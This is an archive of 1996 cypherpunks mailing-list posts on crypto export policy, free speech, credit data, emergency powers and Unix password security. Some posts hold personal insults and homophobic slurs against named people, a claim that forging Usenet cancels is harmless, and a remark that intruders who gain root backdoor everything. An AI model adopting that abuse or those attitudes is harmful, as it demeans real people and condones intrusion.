From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 17 Nov 1996 17:05:54 -0800 (PST)
To: Dave Hayes <dave@kachina.jetcafe.org>
Subject: Re: Does John Gilmore...
In-Reply-To: <199611172116.NAA04343@kachina.jetcafe.org>
Message-ID: <Pine.SUN.3.94.961117200415.13668B-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, Dave Hayes wrote:

> Date: Sun, 17 Nov 1996 13:16:14 -0800
> From: Dave Hayes <dave@kachina.jetcafe.org>
> To: Black Unicorn <unicorn@schloss.li>
> Cc: freedom-knights@jetcafe.org, cypherpunks@toad.com
> Subject: Re: Does John Gilmore... 
> 
> > The free market will ever be the only real path to free speech, because,
> > in essence, it is free speech.
> > Free speech does not, however, require that all speech be universally
> > broadcast to each and every citizen on the planet free of charge.  That's
> > "subsidized speech."
> 
> Given that the free market rule is "he who has the money makes the
> rules", please explain how anything less than "subsidized speech" (as
> you put it) is anything close to free speech?
> 
> [For those who's assumptions rule their perception: I am *not* arguing
> that all speech should be subsidized. I am merely pointing out that
> the organization that is spending the money to broadcast is
> controlling the speech, hence it is *not* free speech in terms of
> freedom or cost.]


Again, you confuse free speech with free broadcast.


> ------
> Dave Hayes - Altadena CA, USA - dave@jetcafe.org 
> Freedom Knight of Usenet - http://www.jetcafe.org/~dave/usenet
> 
>                 If you want to get rid of somebody, 
>             just tell them something for their own good.
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 17 Nov 1996 20:01:40 -0800 (PST)
To: cypherpunks@toad.com
Subject: What do our Netscape folks have to say?
In-Reply-To: <199611180018.QAA10957@netcom6.netcom.com>
Message-ID: <v03007804aeb58e6b17f8@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 6:44 PM -0800 11/17/96, Lucky Green wrote:

>I have a hard time believing that Netscape caved. As I wrote in July, HP
>was working on selling our children's birthright to obtain an export
>license for their product. But Netscape participating in this just
>doesn't sound right.

Indeed, some comments from the usually-vocal Weinstein brothers would be
most welcome.

(I presume they "won't comment on rumors." After Monday's announcement, I
hope we'll hear from the various Netscape people who have commented in the
past.)

If Netscape is part of this sorry situation, it will mean that Jim Clarke's
expression of support for GAK a year ago was the _real_ story, with the "we
won't cave" noises just a pacifier.

By the way, Netscape once promised that their new corporate position was
this: that if the U.S. government insisted on a crippled version for
export, the domestic version would not be crippled at all.

I for one don't think that having the same smartcard, but with different
permissions or approval processes, constitutes having the U.S. version be
"uncrippled."

(Why? Because if Netscape and others widely deploy the H-P/Intel GAK
product, the government could decide any time they want to tighten
licensing for U.S. users, for felons, etc.)

--Tim May



"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Sun, 17 Nov 1996 11:07:56 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: MSIE 128 Bit
Message-ID: <199611171907.UAA07862@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr.Dimitri Vulis KOTM (dlv@bwalk.dm.com) wrote:

: Steve Shelby <sshelby@feist.com> writes:
: >
: > Microsoft has a 128 bit version of their Explorer available.
: >
: > You have to jump through a few hoops, but they have it.

: How about maiking available on a European mirror site with no questions asked?

ftp.replay.com/pub/replay/pub/incoming/0-microsoft/ has one 128 bit version.

--
 Alex de Joode		    http://www.replay.com/people/adejoode
 I have a linux emulator for Win95: it's called "loadlin" ... *g*




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy C. May" <tcmay@got.net>
Date: Sun, 17 Nov 1996 20:05:45 -0800 (PST)
To: Brad Dolan <cypherpunks@toad.com
Subject: Re: TRW sells your credit data to British firm
In-Reply-To: <Pine.GSO.3.95.961117214248.10421A-100000@use.usit.net>
Message-ID: <v03007805aeb5918cd43d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:44 PM -0500 11/17/96, Brad Dolan wrote:

>   [I wonder who the "investor group" is comprised of?  I wonder why TRW would
>    sell something for $1B that is apparently valued at $1.7B?  Reminds me of
>    the local paper which was sold for $X to an investor group that included
>    Sen. Howard Baker and  (Pres. candidate) Lamar Alexander.  The investor
>    group then resold the paper for $2X or $3X.  What business accumen! -bd]

TRW needed to launder $700 M. Or it may'be been a bribe for some other
business deal. Or it may'be been a sweetheart deal for the ex-TRW execs.

Jeez, ask a stupid question...

:-}


--Tim May


"The government announcement is disastrous," said Jim Bidzos,.."We warned IBM
that the National Security Agency would try to twist their technology."
[NYT, 1996-10-02]
We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 17 Nov 1996 12:44:03 -0800 (PST)
To: Tom Van de Wiele <tomvdw@glo.be>
Subject: Re: Please take me off the list
In-Reply-To: <199611171755.SAA25951@phobos.glo.be>
Message-ID: <Pine.LNX.3.94.961117202641.181C-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, Tom Van de Wiele wrote:

> Sir
> 
> Please take me off the list.
> 
> Thanks
> 
> Tom Van de Wiele  -- tomvdw@glo.be
> 

Hrmm.. not only did he misspell "unsubscribe", but he sent it to the wrong
address (if he were _really_ trying to get off the list, he would send a
message to majordomo@toad.com with "unsubscribe cypherpunks tomvdw@glo.be"
in the _message body_).

Many bits were transferred in this message...

 --Deviant
To communicate is the beginning of understanding.
                -- AT&T






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sun, 17 Nov 1996 17:50:23 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: Re: Censor John Gilmore -- EFF is a disgrace!
In-Reply-To: <199611172111.NAA04310@kachina.jetcafe.org>
Message-ID: <0JFkXD6w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dave Hayes <dave@kachina.jetcafe.org> writes:
>
> > #From Phrack 49, file p49-09 published this month:
> ...
> >                                  File 09 of 16
> >                           by Dr.Dimitri Vulis (KOTM)
> >                A Content-Blind Cancelbot for Usenet (CBCB)
> ...
> > And what follows, is Dr. Dimitri, defender of freedom of expression,
> > champion of the anti-censors on the net, posting code to the world to
> > engage in exactly those activities that everyone has been ranting about
> > as being so utterly "horrifying (forged cancellations etc)" as it
> > were.

No. Forging cancels is as a harmless prank. Deleting Usenet articles from
news spool based on cancels is a sign of a badly misconfigured server, and
a newasadmin not doing his job.

> You call yourself on cypherpunks, and you blithely assume that a
> Phrack author actually signs his real name?
>
> Either I thought you guys were *real* hackers and you aren't, or
> this is a very funny troll.

Definitely, the plug-pulling assholes on cypherpunks mailing list don't
qualify as hackers. They can't even write code!

Blah blah blah security through obscurity blah blah blah only the Usenet
Cabal has cancelbots blah blah blah only Usenet Cabal knows how to forge
cancels blah blah blah netwide acceptance of unauthenticated cancels is
crucial to fighting spam blah blah blah. See Tim Skirvin's Cancel FAQ.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 17 Nov 1996 18:41:00 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Taxation Thought Experiment
In-Reply-To: <wk2JXD35w165w@bwalk.dm.com>
Message-ID: <199611180235.UAA00791@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Dr.Dimitri Vulis KOTM wrote:
> ichudov@algebra.com (Igor "FUCK MNE HARDER" Chudov @ home) writes:
> > Dr.Dimitri Vulis KOTM wrote:
> > > Therefore it's sometimes more profitable for a company to raise money by
> > > issuing bonds (debt) and paying tax-deducuble interest than by selling its
> > > stock (equity) and paying non-decuctible dividentds to stockholders.
> > There is, in fact, a neat theorem that says that (*_under certain
> > assumptions_*) the value of a firm does not depend on its capital
> > structure.
> 
> Igor, you begin to sound just like Timmy May - talking about things you know
> nothing about. 

Surely I know nothing about finance. Never claimed otherwise.

> Yes, there's a famous theorem by Franco Modigliani and Merton
> Miller, the Nobel prize winners which says that ABSENT TAXES, the value of the
> firm doesn't depend on its debt-to-equity ratio. M&M also show that under U.S.
> tax laws the best capital structure is 100% debt (again, ignoring other
> available deductions, such as depreciation, and increased risk and cost of
> borrowing as the debt increases).

See below.
 
> "The value of the levered firm is the value of the levered firm plus the
> interest tax shield (the amount of debt times the tax rate)."
> 
> Companies would borrow less (and people would take out mortgages on their
> residences less) if the interest payments weren't tax-deductible.

See, for example, Merton H. Miller, "Debt and Taxes", American Finance
Assn., Vol. XXXII, May 1977, No. 2. 

Page 262: ``... They conclude that the balancing of these bankruptcy costs
against the tax gains of debt finance gives rise to an optimal capital
structure, just as the traditional view has always maintained, though
for somewhat different reasons. 

It is this new and currently fashionable version of the optimal
capital structure that I propose to challenge here. I will argue that 
even in a world in which interest payments are fully deductible in
computing corporate income taxes, the value of the firm, in equilibrium,
will still be independent of its capital structure.''

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Mon, 18 Nov 1996 01:03:15 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of PrivacyRe: The Utility of Privacy
In-Reply-To: <199611170222.SAA10990@mailmasher.com>
Message-ID: <199611180438.UAA15117@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain


Before we complete your school assignment for you how about letting us 
all know the due date and the credit value first.

On Sat, 16 Nov 1996, Huge Cajones Remailer wrote:
 
> Privacy is a hassle.  Is it worth it?
> 
> Which unfortunate situations does privacy prevent?  What are the odds
> that they will occur?  How much effort will it take to prevent these
> outcomes?  As a model, use the present and future situation of a
> typical reader of this list.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <jmr@shopmiami.com>
Date: Sun, 17 Nov 1996 17:56:02 -0800 (PST)
To: cypherpunks@toad.com
Subject: Political influence [was: Re: A Disservice to Mr. Bell]
Message-ID: <199611180155.UAA25194@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: cypherpunks@toad.com
Date: Mon Nov 18 20:54:31 1996
> 
> ....The only mainstream party to have been in
> any measure influenced by libertarian ideas is the Republicans

...

I suppose that's why Clinton called himself a "libertarian" when it comes to 
gay rights. (Calling yourself something and actually *being* that something 
are, of course, different things.)

Phill, you need to listen more and talk less about libertarian politics, I 
first heard about various wild-sounding now "mainstream" ideas when talking 
with Libertarians. These ideas are now promoted by members of both parties, 
especially during the election campaign season. For one thing, we were 
probably the first party to have a policy against government restrictions on 
the peaceful use of cryptography.
JMR


Regards, Jim Ray

Please note new 2000bit PGPkey & new address <jmr@shopmiami.com>
This key will be valid through election day 2000.
PGP id.A7D63DA9 98 1F 39 BA 93 86 B4 F5  57 52 64 0E DA BA 2C 71
DNRC Minister of Encryption Advocacy
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEPAwUBMpETWzUhsGSn1j2pAQGYQgfMCQSQsEEjekyjOaQTptq3ZGmh4eTbPwdT
Ow6LGMOzNTBaONJlypERAm7S00NAf9/ri6liFL2xR/A51t47PPIg48WO4xYHbB2S
UefMasDZ2q+jT1s9ukUgHL1EgXCJVggAsaN1mSphYlNgVrRoT0zga59MB3ynFVsH
hM4NVJEPCv8waE9WohSLUm6Mp2fvA1zLtGmHdf6fR/R38Yw5aVOTA3ha/hV/zPmH
MQIsN+WV16f4KXAL/0V56y1mnuPJ0TumUJwJNc/lNxhiSdlI9t5l3ywe7Aw1D1xo
TQO4ARkBSN8+/C/g6R9wfEZ+YoAN42NzNpdcATmCgXhwYg==
=hhPT
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 18 Nov 1996 01:00:42 -0800 (PST)
To: cypherpunks@toad.com
Subject: BayLISA: Randal Schwartz, Just Another Convicted Perl Hacker (fwd)
Message-ID: <Pine.GUL.3.95.961117210230.15571A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


This should be QUITE entertaining.

-rich

---------- Forwarded message ----------
Date: 17 Nov 1996 19:03:17 -0500
From: Laura de Leon <deleon@cat.hpl.hp.com>
Newsgroups: ba.announce
Subject: BayLISA: Randal Schwartz, Just Another Convicted Perl Hacker

The BayLISA group meets monthly to discuss topics of interest to systems
and network administrators.  The meetings are free and open to the public.

BayLISA holds monthly meetings on the third Thursday of each month at
7:30 PM PST.  We meet at Cisco building J in San Jose, on Tasman Drive near
First street. (This is across the street from the room we met in at Cisco last
month). See www.baylisa.org for more information.  The meetings are also
broadcast via MBONE.

NOTE:  AS OF OCTOBER, WE HAVE MOVED TO CISCO.  This is a new location. Thanks
very much to Synopsys for hosting us.

Schedule
--------
November 21

Randal Schwartz: Just Another Convicted Perl Hacker

This talk will describe how the speaker became a felon in the
process of doing his job as a systems administrator in the
well-publicized Oregon v. Schwartz case (victim: Intel).  It will
include some points about Oregon's current law and the implications
of this case on the computer community.  There will be a special
focus on how to make sure this doesn't happen to you.

There will be copies of Randal's new PERL book available if you would like to
get one signed.


BayLISA Board Elections & member meeting before the regular meeting
At 7:00, Elections for the BayLISA board will be held.  We encourage all
members to vote.  If you aren't a member, this is a good time to join (see our
Web site)


December 19
Our Holiday meeting-- Join us to share goodies and computer horror stories, as
well as descriptions of stupid computer tricks.  There will be a prize for best
story.  This is a very informal meeting, and will not be broadcast on the
MBONE.

January 16
Brent Chapman, Containment Zones (firewalls to keep people in)

February 20
Standards efforts and how they will effect you

March 20
Paul Vixie

[Schedule subject to change]

For further information on BayLISA, check out our web site:
http://www.baylisa.org/

To get further information on the meeting location, you can also ftp it from

	ftp.baylisa.org:/location

For any other information, please send email to:

	info@baylisa.org

If you have any questions, please contact me or the info alias listed above.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@USIT.NET>
Date: Sun, 17 Nov 1996 18:44:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: TRW sells your credit data to British firm
Message-ID: <Pine.GSO.3.95.961117214248.10421A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Assoc. Press 11/14/96:

A British retailer and credit checker said Thursday it was
buying Experian Corp., a former subsidiary of TRW and one of the 
biggest credit-rating business in the United States, for $1.7 billion. 
   
The deal is part of an effort by Great Universal Stores PLC, which owns the
Burberry retail chain and is Britain's largest catalog retailer, to position
itself as a global supplier of credit and marketing information. 

  [I wonder what recourse I have if GUS gets my credit data wrong?  Or 
   decides to share it with MI6?  -bd]
   
Great Universal, known more commonly as GUS, said it would pay $900 million
in cash and borrow the rest of the price for Orange, Calif.-based Experian,
which TRW sold in September. 
   
GUS plans to merge Experian into its credit information business, CCN. 
Experian chairman D. Van Skilling said the two companies have many customers
in common and will be able to provide them easier access to credit information
around the world. 

   [...]

Experian is one of the largest providers of credit reports on consumers with
information on 93 percent of U.S. households and 12 million businesses.
Experian says its database may be the broadest and most current in the country.
The company also helps businesses identify potential customers. 
   
Great Universal entered the credit information business in 1980 and now has
customers throughout Europe and has operations in Asia, South Africa, and the
United States. 
   
TRW completed the sale of Experian for $1.01 billion less than two months
ago. An investor group led by Bain Capital Inc. and Thomas H. Lee Co., both of
Boston, bought the company. TRW kept a 16 percent stake in Experian. 

   [I wonder who the "investor group" is comprised of?  I wonder why TRW would
    sell something for $1B that is apparently valued at $1.7B?  Reminds me of
    the local paper which was sold for $X to an investor group that included 
    Sen. Howard Baker and  (Pres. candidate) Lamar Alexander.  The investor 
    group then resold the paper for $2X or $3X.  What business accumen! -bd]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 17 Nov 1996 14:01:00 -0800 (PST)
To: Dave Kinchlea <security@kinch.ark.com>
Subject: Re: RFC: A UNIX crypt(3) replacement
In-Reply-To: <Pine.LNX.3.95.961117133536.1181L-100000@kinch.ark.com>
Message-ID: <Pine.LNX.3.94.961117215609.504A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, Dave Kinchlea wrote:

> On Sun, 17 Nov 1996, The Deviant wrote:
> 
> > On Sun, 17 Nov 1996, Adam Shostack wrote:
> > > 	A longer salt would make running crack against a large
> > > password file slower.
> > 
> > While thats all well and good, it shouldn't be necisary.  If passwords are
> > shadowed, one must have root access before one can run crack against the
> > password list, at which time it is innefective.
> 
> I couldn't disagree more (not that I necessarily agree or disagree with
> Adam's approach). Sure, once you have root you don't need any other
> access, until the hole is found and closed that gave root in the first
> place. After that, that /etc/shadow file with the lousy passwords (that
> seem inevitable with folks using /etc/shadow as they get complacent
> with a false sense of security) provide the would-be cracker with a set
> of local accounts to (try to) break in again. Local accounts are
> definitely an advantage should you be looking for way to break any Unix
> variant.
> 
> The moral of the story is: ALWAYS ensure that whatever passwords you
> have on your unix system are not beatable by crack, don't rely upon
> hiding them because if you are wrong you are in it up to your neck!
> 
> cheers, kinch
> 

Oh.. you misunderstand what I'm saying... I'm not saying its unemportant
for you to have good passwords or anything like that, I'm just pointing
out that rather than replace the entire system, its more prudent to fully
install it.

I still think admins should run crack against their own lists, etc., but
that still shouldn't be a problem to a good cracker.  If you've just
gotten root on a system, you start backdooring everything, not trying to
crack the password list.

 --Deviant
Even God cannot change the past.
                -- Joseph Stalin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Sun, 17 Nov 1996 19:17:55 -0800 (PST)
To: Charles Platt <cp@panix.com>
Subject: Re: Emergency powers
In-Reply-To: <Pine.SUN.3.91.961117164425.15672A-100000@panix.com>
Message-ID: <Pine.SUN.3.95.961117220716.9703C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, Charles Platt wrote:

> Of course, Michael Froomkin is right in everything he says about
> presidential emergency powers. But an unconstitutional abuse of power is

After this start, how could I be churlish enough to quibble with anything
you say?

> surely not acceptable merely because it has become a routine method for
> accomplishing everyday legislative tasks.  First, it allows significant

We need to be careful here.  Which is the unconstitutional abuse?

a) The Act giving the President emergency powers (IEEPA)
b) The President's use of the act (in this case or in other cases)
c) The courts' decision that the existence of an emergency (as opposed to
the way the powers are used) is not reviewable (more or less on political
question grounds).
d) all of the above.

If I had to pick, my first choice is probably b, then c, then a.  I have
some sympathy for the willingness of courts to duck national security
issues, although not enough sympathy to encompass the amount of ducking we
get.

> possibility for future abuse; and second, if the Constitution is routinely
> circumvented, this diminishes its general power (as any law loses its

Again, what's the circumvention?  The administration, let us assume
honestly, believes that the spread of strong reliable crypto abroad is a
big threat;  if it happens it cannot be undone. They think it ("reliable") 
hasn't happened yet.  I'm inclined to think they're right about the facts
(see e.g. the thread on c'punx or coderpunx about lousy DES
implementations), so far. 

Is it "unconstitutional" to call this an emergency?  Judgment call.  I
think it's an abuse, but it is (1) routinized (EEA lapses have been dealt
with this way before and NO ONE COMPLAINED, not Congress, not the press,
not the courts, not the exporters, not the public); the administration
could reasonably think this was not a controversial thing to do; (2)
within the letter of the act as interpreted (too loosely) by the courts

So all three branches of government agree this is constitutional, and the
public hasn't complained.   Not exactly the foundation for a revolutionary
moment.  Rather, it is time to complain -- while understanding the
context.

> power when it is routinely flouted). The situation is all the more
> troubling because it receives so little publicity, outside of militant
> "extremist" groups (i.e. those that are crazy enough to believe that
> presidential power should be limited in accordance with the law of the
> land). When a president can take almost action under the excuse that it's

Recall that the President almost certainly couldn't do this if Congress
hadn't passed a statute ("the law of the land").  I still think that
Congress is the place where this should, and perhaps ultimately will, be
decided.

I also bet that if Congress did get sensitized to this issue ... they'd
respond by reactivating the EAA.  I don't get the feeling there is a
groundswell in Congress for abandoning export control (recall that the EAA
controls all dual use munitions -- including missile guidance systems).
This is why the courts are all too likely to allow it.  No one in
government wants to allow weapons parts to be freely exported.

[...]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: The Deviant <deviant@pooh-corner.com>
Date: Sun, 17 Nov 1996 14:23:35 -0800 (PST)
To: Dave Kinchlea <security@kinch.ark.com>
Subject: Re: RFC: A UNIX crypt(3) replacement
In-Reply-To: <Pine.LNX.3.95.961117141640.1181M-100000@kinch.ark.com>
Message-ID: <Pine.LNX.3.94.961117222029.564A-100000@random.sp.org>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, Dave Kinchlea wrote:

> On Sun, 17 Nov 1996, The Deviant wrote:
> > 
> > Oh.. you misunderstand what I'm saying... I'm not saying its unemportant
> > for you to have good passwords or anything like that, I'm just pointing
> > out that rather than replace the entire system, its more prudent to fully
> > install it.
> > 
> > I still think admins should run crack against their own lists, etc., but
> > that still shouldn't be a problem to a good cracker.  If you've just
> > gotten root on a system, you start backdooring everything, not trying to
> > crack the password list.
> 
> Well, this certainly *IS* a different statement than I read from you
> before. I don't find anything to disagree with here. Though, if your
> passwords can't be cracked, what is the need for shadow passwords? It
> simply introduces more variables and offers no more security.

While thats all well and good, its also easier said than done.  A creative
cracker can beat a lot of password filter routines.  As somebody said to
me earlier, belt _and_ suspenders works best. ;)

 --Deviant
Blood flows down one leg and up the other.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Sun, 17 Nov 1996 19:24:12 -0800 (PST)
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Members of Parliament Problem
In-Reply-To: <199611171837.SAA00457@server.test.net>
Message-ID: <Pine.SUN.3.91.961117222151.12758A-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Nov 1996, Adam Back wrote:

> Simon Spero <ses@tipper.oit.unc.edu> writes:
> 
> Reasonable, except that it's linkable.  You may not want it to be
> linkable, because the more messages signed with the key, the greater
> the chance that speech paterns give away the speaker.

How about using ephemerialish keys (keys issued in big batches, etc)? 
All you need is a quick way to generate a few hundred or thousand RSA keys...

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Faw <author@pobox.com>
Date: Mon, 18 Nov 1996 00:59:06 -0800 (PST)
To: webmaster@shadowmoon.com
Subject: Re: [Fwd: National Emergency]
Message-ID: <2.2.16.19961118063228.53b7f698@omail.eee.org>
MIME-Version: 1.0
Content-Type: text/plain


At 10:15 PM 11/17/96 -0700, you wrote:
>This information may be of interest to you. Forwarded with permission.
>
>--RJ Dawnne Gee

        Why Dawnne, this is only logical--considering that the new
"WEB-access TV" set announced this week has been declared a "weapon" for
export purposes by our government.  When our leaders consider public
information to be a threat to national security, we're in a whole lot more
trouble than most folks realize.
 
bob faw

p.s.  Go to bed, dude, it's getting late.  ;-)

bob

----------------------------------|-------------------------------------
B. D. "Bob" Faw                   |NewMedia Editor, Columnist, Webmaster
Poet, Scholar, WordSmith, Engineer|"American Wine on the Web"
  http://www.eee.org/bobfaw/      |  (a complete Internet wine magazine)
    bob_faw@eee.org               |    http://www.2way.com/food/wine/
      bfaw@cello.gina.calstate.edu|       newbie@pobox.com
        author@pobox.com          |Senior Writer, "Faultline" TV Series
----------------------------------|-------------------------------------
Webmaster, "The Journal of International Information Management" (JIIM)
      http://bpa1.aic.csusb.edu/pages/students/info479/bfaw/jiim/
----------------------------------|-------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dale Thorn <dthorn@gte.net>
Date: Mon, 18 Nov 1996 00:50:07 -0800 (PST)
To: attila@primenet.com
Subject: Re: San Jose Mercury News declares encryption battle over
In-Reply-To: <199611170747.AAA27780@infowest.com>
Message-ID: <32900924.5F25@gte.net>
MIME-Version: 1.0
Content-Type: text/plain


attila@primenet.com wrote:
>    at 07:52 PM, Dale Thorn <dthorn@gte.net> said:
> ::Point 2: I've said something like this before, but here's a place where
> ::it could mean something.  If c-punks and others could divvy up as many
> ::of the supporting functions of "strong" crypto as possible, and issue
> ::them in a set of commonly-available libraries for any and all programmers,
> ::along with source code, then an application programmer (theoretically)
> ::could order up some of these libraries and write some useful crypto code
> ::in short order.

>         one of the best proposals in many years --we have all made good
>     use of library code over the years, unless the simpleton coder has a
>     obsessive-compulsive masochistic need to write an extra 20-50,000
>     lines of 'reinvent the wheel' code.

[remaining text deleted]

I wouldn't bother the list with this kind of suggestion except that,
since so many subscribers feel the situation of freedom -vs- the new
federal urgency to shut down crypto is getting desperate, I urge a
desperate solution, i.e., an unparalleled level of cooperation.

As a personal preference, assuming no government involvement, I would
recommend more creativity and choices, but....






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Mon, 18 Nov 1996 01:01:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: [NOISE]  Want to know about this "aga" character?  Read the Grubo
In-Reply-To: <328F7BDD.D1F@netcom.com>
Message-ID: <gqmkXD7w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


In a touching display of Lesbian solidarity, Alan "got AIDS yet" Bostick
<abostick@netcom.com> sheds alt.grelb dandruff in support of his fellow
10%er, the plug-pulling liar and dishonorable censor John Gilmore:

> makes Dimitri Vulis appear sane, calm, and rational.

Bullshit. Nothing and no one makes me appear sane, calm, or rational,
not even The Herb. Read sci.med.cannabis for more details.

> Read the Grubor FAQ, http:blah blah blah
> for more details.

Also read http://www.mindspring.com/~netscum/flaqu for more details on
Alan, John, and their merry playmates.

> Alan "pseudonum of the LYING FORGER PETER VOROBIEFF!!!!1!" Bostick

Are Pidor Voribiev and John Gilmore lovers?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@huge.cajones.com (Huge Cajones Remailer)
Date: Mon, 18 Nov 1996 00:51:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: The Utility of Privacy
Message-ID: <199611180713.XAA26863@mailmasher.com>
MIME-Version: 1.0
Content-Type: text/plain



At 8:03 PM 11/17/1996, Black Unicorn wrote:
>On Sun, 17 Nov 1996, Huge Cajones Remailer wrote:
>> Are there similar sources of information calculating privacy risk?  I
>> don't think so.
>
>Ah, so let's ignore the risks, on the grounds that we have no idea what
>they might be, or their magnitude.  That's clever.  I like that.

The risks are not being ignored.  What is there to fear?

>> Informally, I don't know anybody who has suffered due to a loss of
>> privacy.
>
>Your circle of associations must be limited.

Examples?

>> My question remains unanswered, probably because privacy isn't worth
>> the effort.
>
>And no one can answer that question but you.  Privacy is a personal
>decision.  I'm sure there are many out there who will suffer no harm even
>if their SSN is published in the Wall Street Journal.

The experience of others has value.

>Why, however, fail to take out insurance when the cost is so low?  Really
>it doesn't take much in the way of effort or money to assure one's
>privacy.  (Hint: It's getting cheaper every day in some ways).
>
>Answer: Nearly all of the cost of privacy is concentrated in set up cost.
>Maintaince costs are minimal once set up has been made.  Yet getting over
>that first hurdle is the biggest leap.

Good.  We are getting somewhere.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George A. Stathis" <hyperlex@hol.gr>
Date: Sun, 17 Nov 1996 13:21:04 -0800 (PST)
To: freedom-knights@jetcafe.org
Subject: You ought to REALLY look at this...
Message-ID: <199611180117.XAA10583@prometheus.hol.gr>
MIME-Version: 1.0
Content-Type: text/plain


Ladies and Gentlemen,

I hereby quote a rather remarkable letter, which I pass on to whom it may
concern. I consider it an _honour_ to have received such a letter, even
though the material expressed in the letter is a serious assault on the
entire Western Value System, and possibly Civilisation itself, no joke.

At first I did not believe such a *terrorist* letter could have EVER been
written. And I could never believe myself to be the recipient of it either.

But now I strongly recommend you read it carefully and think about it...

For your OWN benefit, I believe more than mine...

With thanks for your attention
George A. Stathis

P.S. If you take a deep breath, see my (amusing?) comments in the end. :)



>Hops: 0
>Posted-Date: Sun, 17 Nov 1996 20:13:15 -0200 (GMT)
